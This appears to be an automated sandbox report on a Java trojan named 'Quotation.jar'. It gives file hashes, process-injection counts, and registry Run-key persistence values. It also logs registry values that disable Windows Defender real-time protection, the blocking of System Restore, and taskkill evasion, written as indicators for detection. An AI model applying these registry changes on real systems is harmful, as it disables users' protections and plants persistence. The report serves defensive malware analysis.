add0d88665429072983eeec4d8db4f8d1ce6cd39fe519f693a3b94bf3c0effef

Resubmissions

02/03/2020, 14:38

200302-t6xq9fwvas 10

01/03/2020, 13:36

200301-y5qej6pnj6 10

Analysis

max time kernel
299s
max time network
301s
platform
windows7_x64
resource
win7v200217
submitted
02/03/2020, 14:38

Sharing

Copy URL

Twitter E-mail

General

Target

Quotation.jar
Size

377KB
MD5

467c999fd06b4f90664bdb08bc3ce0f1
SHA1

2674f8dff289f0137c26c19f04a98e3078029fa8
SHA256

add0d88665429072983eeec4d8db4f8d1ce6cd39fe519f693a3b94bf3c0effef
SHA512

4f5398576aab26154306983dd76116d28eed58a9996a83769d2b41b3803406c0bfb0799f86f955fc09d87efd686f5a77f80f67eb2c4b71a0bd70c556ec28f17a

Score

10^/10

persistence discovery evasion trojan

Malware Config

Signatures

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1840	java.exe

Suspicious use of WriteProcessMemory 342 IoCs

description	pid	Process	procid_target
PID 1840 wrote to memory of 1936	1840	java.exe	25
PID 1840 wrote to memory of 1936	1840	java.exe	25
PID 1840 wrote to memory of 1936	1840	java.exe	25
PID 1840 wrote to memory of 1944	1840	java.exe	26
PID 1840 wrote to memory of 1944	1840	java.exe	26
PID 1840 wrote to memory of 1944	1840	java.exe	26
PID 1840 wrote to memory of 1988	1840	java.exe	28
PID 1840 wrote to memory of 1988	1840	java.exe	28
PID 1840 wrote to memory of 1988	1840	java.exe	28
PID 1840 wrote to memory of 2040	1840	java.exe	30
PID 1840 wrote to memory of 2040	1840	java.exe	30
PID 1840 wrote to memory of 2040	1840	java.exe	30
PID 1840 wrote to memory of 1004	1840	java.exe	31
PID 1840 wrote to memory of 1004	1840	java.exe	31
PID 1840 wrote to memory of 1004	1840	java.exe	31
PID 1840 wrote to memory of 868	1840	java.exe	32
PID 1840 wrote to memory of 868	1840	java.exe	32
PID 1840 wrote to memory of 868	1840	java.exe	32
PID 1840 wrote to memory of 612	1840	java.exe	33
PID 1840 wrote to memory of 612	1840	java.exe	33
PID 1840 wrote to memory of 612	1840	java.exe	33
PID 1840 wrote to memory of 960	1840	java.exe	34
PID 1840 wrote to memory of 960	1840	java.exe	34
PID 1840 wrote to memory of 960	1840	java.exe	34
PID 1840 wrote to memory of 1208	1840	java.exe	35
PID 1840 wrote to memory of 1208	1840	java.exe	35
PID 1840 wrote to memory of 1208	1840	java.exe	35
PID 1840 wrote to memory of 1344	1840	java.exe	36
PID 1840 wrote to memory of 1344	1840	java.exe	36
PID 1840 wrote to memory of 1344	1840	java.exe	36
PID 1840 wrote to memory of 1356	1840	java.exe	37
PID 1840 wrote to memory of 1356	1840	java.exe	37
PID 1840 wrote to memory of 1356	1840	java.exe	37
PID 1840 wrote to memory of 1556	1840	java.exe	38
PID 1840 wrote to memory of 1556	1840	java.exe	38
PID 1840 wrote to memory of 1556	1840	java.exe	38
PID 1840 wrote to memory of 1560	1840	java.exe	41
PID 1840 wrote to memory of 1560	1840	java.exe	41
PID 1840 wrote to memory of 1560	1840	java.exe	41
PID 1840 wrote to memory of 1468	1840	java.exe	40
PID 1840 wrote to memory of 1468	1840	java.exe	40
PID 1840 wrote to memory of 1468	1840	java.exe	40
PID 1840 wrote to memory of 1592	1840	java.exe	43
PID 1840 wrote to memory of 1592	1840	java.exe	43
PID 1840 wrote to memory of 1592	1840	java.exe	43
PID 1840 wrote to memory of 1616	1840	java.exe	44
PID 1840 wrote to memory of 1616	1840	java.exe	44
PID 1840 wrote to memory of 1616	1840	java.exe	44
PID 1840 wrote to memory of 932	1840	java.exe	48
PID 1840 wrote to memory of 932	1840	java.exe	48
PID 1840 wrote to memory of 932	1840	java.exe	48
PID 1840 wrote to memory of 324	1840	java.exe	49
PID 1840 wrote to memory of 324	1840	java.exe	49
PID 1840 wrote to memory of 324	1840	java.exe	49
PID 1840 wrote to memory of 1608	1840	java.exe	50
PID 1840 wrote to memory of 1608	1840	java.exe	50
PID 1840 wrote to memory of 1608	1840	java.exe	50
PID 1840 wrote to memory of 964	1840	java.exe	53
PID 1840 wrote to memory of 964	1840	java.exe	53
PID 1840 wrote to memory of 964	1840	java.exe	53
PID 1840 wrote to memory of 1760	1840	java.exe	57
PID 1840 wrote to memory of 1628	1840	java.exe	56
PID 1840 wrote to memory of 1760	1840	java.exe	57
PID 1840 wrote to memory of 1628	1840	java.exe	56
PID 1840 wrote to memory of 1760	1840	java.exe	57
PID 1840 wrote to memory of 1628	1840	java.exe	56
PID 1840 wrote to memory of 1808	1840	java.exe	60
PID 1840 wrote to memory of 1808	1840	java.exe	60
PID 1840 wrote to memory of 1808	1840	java.exe	60
PID 1840 wrote to memory of 1812	1840	java.exe	61
PID 1840 wrote to memory of 1812	1840	java.exe	61
PID 1840 wrote to memory of 1812	1840	java.exe	61
PID 1840 wrote to memory of 1420	1840	java.exe	64
PID 1840 wrote to memory of 1420	1840	java.exe	64
PID 1840 wrote to memory of 1420	1840	java.exe	64
PID 1840 wrote to memory of 1440	1840	java.exe	65
PID 1840 wrote to memory of 1440	1840	java.exe	65
PID 1840 wrote to memory of 1440	1840	java.exe	65
PID 1840 wrote to memory of 2012	1840	java.exe	69
PID 1840 wrote to memory of 2012	1840	java.exe	69
PID 1840 wrote to memory of 2012	1840	java.exe	69
PID 1840 wrote to memory of 1936	1840	java.exe	70
PID 1840 wrote to memory of 1936	1840	java.exe	70
PID 1840 wrote to memory of 1936	1840	java.exe	70
PID 1840 wrote to memory of 1992	1840	java.exe	71
PID 1840 wrote to memory of 1992	1840	java.exe	71
PID 1840 wrote to memory of 1992	1840	java.exe	71
PID 1840 wrote to memory of 2044	1840	java.exe	74
PID 1840 wrote to memory of 2044	1840	java.exe	74
PID 1840 wrote to memory of 2044	1840	java.exe	74
PID 1840 wrote to memory of 1244	1840	java.exe	76
PID 1840 wrote to memory of 1244	1840	java.exe	76
PID 1840 wrote to memory of 1244	1840	java.exe	76
PID 1840 wrote to memory of 292	1840	java.exe	79
PID 1840 wrote to memory of 292	1840	java.exe	79
PID 1840 wrote to memory of 292	1840	java.exe	79
PID 1840 wrote to memory of 1032	1840	java.exe	81
PID 1840 wrote to memory of 1032	1840	java.exe	81
PID 1840 wrote to memory of 1032	1840	java.exe	81
PID 1840 wrote to memory of 1824	1840	java.exe	83
PID 1840 wrote to memory of 1824	1840	java.exe	83
PID 1840 wrote to memory of 1824	1840	java.exe	83
PID 1840 wrote to memory of 1600	1840	java.exe	86
PID 1840 wrote to memory of 1600	1840	java.exe	86
PID 1840 wrote to memory of 1600	1840	java.exe	86
PID 1840 wrote to memory of 1580	1840	java.exe	87
PID 1840 wrote to memory of 1580	1840	java.exe	87
PID 1840 wrote to memory of 1580	1840	java.exe	87
PID 1840 wrote to memory of 1616	1840	java.exe	90
PID 1840 wrote to memory of 1616	1840	java.exe	90
PID 1840 wrote to memory of 1616	1840	java.exe	90
PID 1840 wrote to memory of 1996	1840	java.exe	92
PID 1840 wrote to memory of 1996	1840	java.exe	92
PID 1840 wrote to memory of 1996	1840	java.exe	92
PID 1840 wrote to memory of 1648	1840	java.exe	95
PID 1840 wrote to memory of 1648	1840	java.exe	95
PID 1840 wrote to memory of 1648	1840	java.exe	95
PID 1840 wrote to memory of 2000	1840	java.exe	98
PID 1840 wrote to memory of 2000	1840	java.exe	98
PID 1840 wrote to memory of 2000	1840	java.exe	98
PID 1840 wrote to memory of 1048	1840	java.exe	102
PID 1840 wrote to memory of 1048	1840	java.exe	102
PID 1840 wrote to memory of 1048	1840	java.exe	102
PID 1840 wrote to memory of 1716	1840	java.exe	105
PID 1840 wrote to memory of 1716	1840	java.exe	105
PID 1840 wrote to memory of 1716	1840	java.exe	105
PID 1840 wrote to memory of 736	1840	java.exe	107
PID 1840 wrote to memory of 736	1840	java.exe	107
PID 1840 wrote to memory of 736	1840	java.exe	107
PID 1840 wrote to memory of 1952	1840	java.exe	110
PID 1840 wrote to memory of 1952	1840	java.exe	110
PID 1840 wrote to memory of 1952	1840	java.exe	110
PID 1840 wrote to memory of 300	1840	java.exe	113
PID 1840 wrote to memory of 300	1840	java.exe	113
PID 1840 wrote to memory of 300	1840	java.exe	113
PID 1840 wrote to memory of 1728	1840	java.exe	116
PID 1840 wrote to memory of 1728	1840	java.exe	116
PID 1840 wrote to memory of 1728	1840	java.exe	116
PID 1840 wrote to memory of 1384	1840	java.exe	119
PID 1840 wrote to memory of 1384	1840	java.exe	119
PID 1840 wrote to memory of 1384	1840	java.exe	119
PID 1840 wrote to memory of 1032	1840	java.exe	122
PID 1840 wrote to memory of 1032	1840	java.exe	122
PID 1840 wrote to memory of 1032	1840	java.exe	122
PID 1840 wrote to memory of 292	1840	java.exe	125
PID 1840 wrote to memory of 292	1840	java.exe	125
PID 1840 wrote to memory of 292	1840	java.exe	125
PID 1840 wrote to memory of 1972	1840	java.exe	128
PID 1840 wrote to memory of 1972	1840	java.exe	128
PID 1840 wrote to memory of 1972	1840	java.exe	128
PID 1840 wrote to memory of 1600	1840	java.exe	131
PID 1840 wrote to memory of 1600	1840	java.exe	131
PID 1840 wrote to memory of 1600	1840	java.exe	131
PID 1840 wrote to memory of 1668	1840	java.exe	134
PID 1840 wrote to memory of 1668	1840	java.exe	134
PID 1840 wrote to memory of 1668	1840	java.exe	134
PID 1840 wrote to memory of 1652	1840	java.exe	136
PID 1840 wrote to memory of 1652	1840	java.exe	136
PID 1840 wrote to memory of 1652	1840	java.exe	136
PID 1840 wrote to memory of 1596	1840	java.exe	139
PID 1840 wrote to memory of 1596	1840	java.exe	139
PID 1840 wrote to memory of 1596	1840	java.exe	139
PID 1840 wrote to memory of 1944	1840	java.exe	142
PID 1840 wrote to memory of 1944	1840	java.exe	142
PID 1840 wrote to memory of 1944	1840	java.exe	142
PID 1840 wrote to memory of 1560	1840	java.exe	145
PID 1840 wrote to memory of 1560	1840	java.exe	145
PID 1840 wrote to memory of 1560	1840	java.exe	145
PID 1840 wrote to memory of 1164	1840	java.exe	148
PID 1840 wrote to memory of 1164	1840	java.exe	148
PID 1840 wrote to memory of 1164	1840	java.exe	148
PID 1840 wrote to memory of 1436	1840	java.exe	151
PID 1840 wrote to memory of 1436	1840	java.exe	151
PID 1840 wrote to memory of 1436	1840	java.exe	151
PID 1840 wrote to memory of 1448	1840	java.exe	154
PID 1840 wrote to memory of 1448	1840	java.exe	154
PID 1840 wrote to memory of 1448	1840	java.exe	154
PID 1840 wrote to memory of 612	1840	java.exe	157
PID 1840 wrote to memory of 612	1840	java.exe	157
PID 1840 wrote to memory of 612	1840	java.exe	157
PID 1840 wrote to memory of 1468	1840	java.exe	160
PID 1840 wrote to memory of 1468	1840	java.exe	160
PID 1840 wrote to memory of 1468	1840	java.exe	160
PID 1840 wrote to memory of 1992	1840	java.exe	162
PID 1840 wrote to memory of 1992	1840	java.exe	162
PID 1840 wrote to memory of 1992	1840	java.exe	162
PID 1840 wrote to memory of 1588	1840	java.exe	165
PID 1840 wrote to memory of 1588	1840	java.exe	165
PID 1840 wrote to memory of 1588	1840	java.exe	165
PID 1840 wrote to memory of 112	1840	java.exe	168
PID 1840 wrote to memory of 112	1840	java.exe	168
PID 1840 wrote to memory of 112	1840	java.exe	168
PID 1840 wrote to memory of 288	1840	java.exe	171
PID 1840 wrote to memory of 288	1840	java.exe	171
PID 1840 wrote to memory of 288	1840	java.exe	171
PID 1840 wrote to memory of 1788	1840	java.exe	174
PID 1840 wrote to memory of 1788	1840	java.exe	174
PID 1840 wrote to memory of 1788	1840	java.exe	174
PID 1840 wrote to memory of 1552	1840	java.exe	177
PID 1840 wrote to memory of 1552	1840	java.exe	177
PID 1840 wrote to memory of 1552	1840	java.exe	177
PID 1840 wrote to memory of 936	1840	java.exe	180
PID 1840 wrote to memory of 936	1840	java.exe	180
PID 1840 wrote to memory of 936	1840	java.exe	180
PID 1840 wrote to memory of 1976	1840	java.exe	183
PID 1840 wrote to memory of 1976	1840	java.exe	183
PID 1840 wrote to memory of 1976	1840	java.exe	183
PID 1840 wrote to memory of 1796	1840	java.exe	186
PID 1840 wrote to memory of 1796	1840	java.exe	186
PID 1840 wrote to memory of 1796	1840	java.exe	186
PID 1840 wrote to memory of 1624	1840	java.exe	189
PID 1840 wrote to memory of 1624	1840	java.exe	189
PID 1840 wrote to memory of 1624	1840	java.exe	189
PID 1840 wrote to memory of 296	1840	java.exe	192
PID 1840 wrote to memory of 296	1840	java.exe	192
PID 1840 wrote to memory of 296	1840	java.exe	192
PID 1840 wrote to memory of 1304	1840	java.exe	194
PID 1840 wrote to memory of 1304	1840	java.exe	194
PID 1840 wrote to memory of 1304	1840	java.exe	194
PID 1840 wrote to memory of 856	1840	java.exe	197
PID 1840 wrote to memory of 856	1840	java.exe	197
PID 1840 wrote to memory of 856	1840	java.exe	197
PID 1840 wrote to memory of 1648	1840	java.exe	200
PID 1840 wrote to memory of 1648	1840	java.exe	200
PID 1840 wrote to memory of 1648	1840	java.exe	200
PID 1840 wrote to memory of 1468	1840	java.exe	203
PID 1840 wrote to memory of 1468	1840	java.exe	203
PID 1840 wrote to memory of 1468	1840	java.exe	203
PID 1840 wrote to memory of 1416	1840	java.exe	206
PID 1840 wrote to memory of 1416	1840	java.exe	206
PID 1840 wrote to memory of 1416	1840	java.exe	206
PID 1840 wrote to memory of 1664	1840	java.exe	209
PID 1840 wrote to memory of 1664	1840	java.exe	209
PID 1840 wrote to memory of 1664	1840	java.exe	209
PID 1840 wrote to memory of 324	1840	java.exe	212
PID 1840 wrote to memory of 324	1840	java.exe	212
PID 1840 wrote to memory of 324	1840	java.exe	212
PID 1840 wrote to memory of 2008	1840	java.exe	215
PID 1840 wrote to memory of 2008	1840	java.exe	215
PID 1840 wrote to memory of 2008	1840	java.exe	215
PID 1840 wrote to memory of 1960	1840	java.exe	218
PID 1840 wrote to memory of 1960	1840	java.exe	218
PID 1840 wrote to memory of 1960	1840	java.exe	218
PID 1840 wrote to memory of 1216	1840	java.exe	221
PID 1840 wrote to memory of 1216	1840	java.exe	221
PID 1840 wrote to memory of 1216	1840	java.exe	221
PID 1840 wrote to memory of 964	1840	java.exe	222
PID 1840 wrote to memory of 964	1840	java.exe	222
PID 1840 wrote to memory of 964	1840	java.exe	222
PID 1840 wrote to memory of 2016	1840	java.exe	226
PID 1840 wrote to memory of 2016	1840	java.exe	226
PID 1840 wrote to memory of 2016	1840	java.exe	226
PID 1840 wrote to memory of 2000	1840	java.exe	229
PID 1840 wrote to memory of 2000	1840	java.exe	229
PID 1840 wrote to memory of 2000	1840	java.exe	229
PID 1840 wrote to memory of 1544	1840	java.exe	232
PID 1840 wrote to memory of 1544	1840	java.exe	232
PID 1840 wrote to memory of 1544	1840	java.exe	232
PID 1840 wrote to memory of 1304	1840	java.exe	235
PID 1840 wrote to memory of 1304	1840	java.exe	235
PID 1840 wrote to memory of 1304	1840	java.exe	235
PID 1840 wrote to memory of 936	1840	java.exe	238
PID 1840 wrote to memory of 936	1840	java.exe	238
PID 1840 wrote to memory of 936	1840	java.exe	238
PID 1840 wrote to memory of 288	1840	java.exe	241
PID 1840 wrote to memory of 288	1840	java.exe	241
PID 1840 wrote to memory of 288	1840	java.exe	241
PID 1840 wrote to memory of 1448	1840	java.exe	244
PID 1840 wrote to memory of 1448	1840	java.exe	244
PID 1840 wrote to memory of 1448	1840	java.exe	244
PID 1840 wrote to memory of 1436	1840	java.exe	247
PID 1840 wrote to memory of 1436	1840	java.exe	247
PID 1840 wrote to memory of 1436	1840	java.exe	247
PID 1840 wrote to memory of 1600	1840	java.exe	250
PID 1840 wrote to memory of 1600	1840	java.exe	250
PID 1840 wrote to memory of 1600	1840	java.exe	250
PID 1840 wrote to memory of 1972	1840	java.exe	253
PID 1840 wrote to memory of 1972	1840	java.exe	253
PID 1840 wrote to memory of 1972	1840	java.exe	253
PID 1840 wrote to memory of 1384	1840	java.exe	254
PID 1840 wrote to memory of 1384	1840	java.exe	254
PID 1840 wrote to memory of 1384	1840	java.exe	254
PID 1840 wrote to memory of 1952	1840	java.exe	258
PID 1840 wrote to memory of 1952	1840	java.exe	258
PID 1840 wrote to memory of 1952	1840	java.exe	258
PID 1840 wrote to memory of 1656	1840	java.exe	261
PID 1840 wrote to memory of 1656	1840	java.exe	261
PID 1840 wrote to memory of 1656	1840	java.exe	261
PID 1840 wrote to memory of 1456	1840	java.exe	264
PID 1840 wrote to memory of 1456	1840	java.exe	264
PID 1840 wrote to memory of 1456	1840	java.exe	264
PID 1840 wrote to memory of 740	1840	java.exe	267
PID 1840 wrote to memory of 740	1840	java.exe	267
PID 1840 wrote to memory of 740	1840	java.exe	267
PID 1840 wrote to memory of 1460	1840	java.exe	270
PID 1840 wrote to memory of 1460	1840	java.exe	270
PID 1840 wrote to memory of 1460	1840	java.exe	270
PID 1840 wrote to memory of 1344	1840	java.exe	273
PID 1840 wrote to memory of 1344	1840	java.exe	273
PID 1840 wrote to memory of 1344	1840	java.exe	273
PID 1840 wrote to memory of 1988	1840	java.exe	276
PID 1840 wrote to memory of 1988	1840	java.exe	276
PID 1840 wrote to memory of 1988	1840	java.exe	276
PID 1840 wrote to memory of 2044	1840	java.exe	279
PID 1840 wrote to memory of 2044	1840	java.exe	279
PID 1840 wrote to memory of 2044	1840	java.exe	279
PID 1840 wrote to memory of 1612	1840	java.exe	282
PID 1840 wrote to memory of 1612	1840	java.exe	282
PID 1840 wrote to memory of 1612	1840	java.exe	282
PID 1840 wrote to memory of 1644	1840	java.exe	285
PID 1840 wrote to memory of 1644	1840	java.exe	285
PID 1840 wrote to memory of 1644	1840	java.exe	285
PID 1840 wrote to memory of 1936	1840	java.exe	288
PID 1840 wrote to memory of 1936	1840	java.exe	288
PID 1840 wrote to memory of 1936	1840	java.exe	288
PID 1840 wrote to memory of 1608	1840	java.exe	291
PID 1840 wrote to memory of 1608	1840	java.exe	291
PID 1840 wrote to memory of 1608	1840	java.exe	291
PID 1840 wrote to memory of 112	1840	java.exe	293
PID 1840 wrote to memory of 112	1840	java.exe	293
PID 1840 wrote to memory of 112	1840	java.exe	293
PID 1840 wrote to memory of 1728	1840	java.exe	295
PID 1840 wrote to memory of 1728	1840	java.exe	295
PID 1840 wrote to memory of 1728	1840	java.exe	295
PID 1840 wrote to memory of 1772	1840	java.exe	297
PID 1840 wrote to memory of 1772	1840	java.exe	297
PID 1840 wrote to memory of 1772	1840	java.exe	297
PID 1840 wrote to memory of 1452	1840	java.exe	299
PID 1840 wrote to memory of 1452	1840	java.exe	299
PID 1840 wrote to memory of 1452	1840	java.exe	299
PID 1840 wrote to memory of 1956	1840	java.exe	301
PID 1840 wrote to memory of 1956	1840	java.exe	301
PID 1840 wrote to memory of 1956	1840	java.exe	301
PID 1840 wrote to memory of 1576	1840	java.exe	303
PID 1840 wrote to memory of 1576	1840	java.exe	303
PID 1840 wrote to memory of 1576	1840	java.exe	303
PID 1840 wrote to memory of 1972	1840	java.exe	305
PID 1840 wrote to memory of 1972	1840	java.exe	305
PID 1840 wrote to memory of 1972	1840	java.exe	305
PID 1840 wrote to memory of 1616	1840	java.exe	307
PID 1840 wrote to memory of 1616	1840	java.exe	307
PID 1840 wrote to memory of 1616	1840	java.exe	307

Loads dropped DLL 1 IoCs

pid	Process
1840	java.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1556	powershell.exe
1556	powershell.exe

Adds Run entry to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\SAsHACQ = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\xIGQs\\WXPuH.class\""	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Software\Microsoft\Windows\CurrentVersion\Run\SAsHACQ = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\xIGQs\\WXPuH.class\""	java.exe

Suspicious use of AdjustPrivilegeToken 97 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1952	WMIC.exe
Token: SeSecurityPrivilege	1952	WMIC.exe
Token: SeTakeOwnershipPrivilege	1952	WMIC.exe
Token: SeLoadDriverPrivilege	1952	WMIC.exe
Token: SeSystemProfilePrivilege	1952	WMIC.exe
Token: SeSystemtimePrivilege	1952	WMIC.exe
Token: SeProfSingleProcessPrivilege	1952	WMIC.exe
Token: SeIncBasePriorityPrivilege	1952	WMIC.exe
Token: SeCreatePagefilePrivilege	1952	WMIC.exe
Token: SeBackupPrivilege	1952	WMIC.exe
Token: SeRestorePrivilege	1952	WMIC.exe
Token: SeShutdownPrivilege	1952	WMIC.exe
Token: SeDebugPrivilege	1952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1952	WMIC.exe
Token: SeRemoteShutdownPrivilege	1952	WMIC.exe
Token: SeUndockPrivilege	1952	WMIC.exe
Token: SeManageVolumePrivilege	1952	WMIC.exe
Token: 33	1952	WMIC.exe
Token: 34	1952	WMIC.exe
Token: 35	1952	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1952	WMIC.exe
Token: SeSecurityPrivilege	1952	WMIC.exe
Token: SeTakeOwnershipPrivilege	1952	WMIC.exe
Token: SeLoadDriverPrivilege	1952	WMIC.exe
Token: SeSystemProfilePrivilege	1952	WMIC.exe
Token: SeSystemtimePrivilege	1952	WMIC.exe
Token: SeProfSingleProcessPrivilege	1952	WMIC.exe
Token: SeIncBasePriorityPrivilege	1952	WMIC.exe
Token: SeCreatePagefilePrivilege	1952	WMIC.exe
Token: SeBackupPrivilege	1952	WMIC.exe
Token: SeRestorePrivilege	1952	WMIC.exe
Token: SeShutdownPrivilege	1952	WMIC.exe
Token: SeDebugPrivilege	1952	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1952	WMIC.exe
Token: SeRemoteShutdownPrivilege	1952	WMIC.exe
Token: SeUndockPrivilege	1952	WMIC.exe
Token: SeManageVolumePrivilege	1952	WMIC.exe
Token: 33	1952	WMIC.exe
Token: 34	1952	WMIC.exe
Token: 35	1952	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1996	WMIC.exe
Token: SeSecurityPrivilege	1996	WMIC.exe
Token: SeTakeOwnershipPrivilege	1996	WMIC.exe
Token: SeLoadDriverPrivilege	1996	WMIC.exe
Token: SeSystemProfilePrivilege	1996	WMIC.exe
Token: SeSystemtimePrivilege	1996	WMIC.exe
Token: SeProfSingleProcessPrivilege	1996	WMIC.exe
Token: SeIncBasePriorityPrivilege	1996	WMIC.exe
Token: SeCreatePagefilePrivilege	1996	WMIC.exe
Token: SeBackupPrivilege	1996	WMIC.exe
Token: SeRestorePrivilege	1996	WMIC.exe
Token: SeShutdownPrivilege	1996	WMIC.exe
Token: SeDebugPrivilege	1996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1996	WMIC.exe
Token: SeRemoteShutdownPrivilege	1996	WMIC.exe
Token: SeUndockPrivilege	1996	WMIC.exe
Token: SeManageVolumePrivilege	1996	WMIC.exe
Token: 33	1996	WMIC.exe
Token: 34	1996	WMIC.exe
Token: 35	1996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1996	WMIC.exe
Token: SeSecurityPrivilege	1996	WMIC.exe
Token: SeTakeOwnershipPrivilege	1996	WMIC.exe
Token: SeLoadDriverPrivilege	1996	WMIC.exe
Token: SeSystemProfilePrivilege	1996	WMIC.exe
Token: SeSystemtimePrivilege	1996	WMIC.exe
Token: SeProfSingleProcessPrivilege	1996	WMIC.exe
Token: SeIncBasePriorityPrivilege	1996	WMIC.exe
Token: SeCreatePagefilePrivilege	1996	WMIC.exe
Token: SeBackupPrivilege	1996	WMIC.exe
Token: SeRestorePrivilege	1996	WMIC.exe
Token: SeShutdownPrivilege	1996	WMIC.exe
Token: SeDebugPrivilege	1996	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1996	WMIC.exe
Token: SeRemoteShutdownPrivilege	1996	WMIC.exe
Token: SeUndockPrivilege	1996	WMIC.exe
Token: SeManageVolumePrivilege	1996	WMIC.exe
Token: 33	1996	WMIC.exe
Token: 34	1996	WMIC.exe
Token: 35	1996	WMIC.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe
Token: SeDebugPrivilege	1668	taskkill.exe
Token: SeDebugPrivilege	1468	taskkill.exe
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	296	taskkill.exe
Token: SeDebugPrivilege	964	taskkill.exe
Token: SeDebugPrivilege	1384	taskkill.exe
Token: SeDebugPrivilege	1608	taskkill.exe
Token: SeDebugPrivilege	112	taskkill.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	1772	taskkill.exe
Token: SeDebugPrivilege	1452	taskkill.exe
Token: SeDebugPrivilege	1956	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeDebugPrivilege	1972	taskkill.exe
Token: SeDebugPrivilege	1616	taskkill.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
1668	taskkill.exe
1728	taskkill.exe
296	taskkill.exe
964	taskkill.exe
1384	taskkill.exe
1772	taskkill.exe
1452	taskkill.exe
1560	taskkill.exe
1468	taskkill.exe
1608	taskkill.exe
112	taskkill.exe
1956	taskkill.exe
1576	taskkill.exe
1616	taskkill.exe
1716	taskkill.exe
1972	taskkill.exe

Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\rkeFf	java.exe
File opened for modification	C:\Windows\System32\rkeFf	java.exe
File deleted	C:\Windows\System32\rkeFf	java.exe

Checks for installed software on the system 1 TTPs 49 IoCs

discovery

Query Registry

T1012

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-1000-0000000FF1CE}\DisplayName	reg.exe
